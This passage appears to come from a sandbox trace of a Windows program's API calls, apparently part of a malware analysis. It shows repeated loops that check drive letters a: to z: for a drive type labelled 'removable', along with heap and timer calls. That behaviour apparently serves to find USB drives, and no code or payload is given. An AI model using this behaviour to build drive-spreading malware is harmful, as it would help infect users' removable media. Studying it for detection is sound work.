returned 0x3 [0215.769] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.770] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.770] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.770] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.770] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.770] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.771] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.772] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.773] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.773] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.773] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.773] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.773] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.774] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.774] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.774] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.774] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0215.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0215.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.775] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.775] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.776] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.776] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.776] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.776] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.777] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.777] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.778] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.778] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.778] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.778] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.778] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.779] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.780] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.780] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.780] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.780] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.781] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.781] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.782] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.783] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.783] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.783] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0215.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0215.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.784] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.784] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.784] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.785] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.785] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.785] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.785] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.785] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.786] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.786] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.786] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.787] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.788] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.789] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.789] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.790] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.790] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.790] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.791] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.792] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.795] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.795] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.795] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.817] 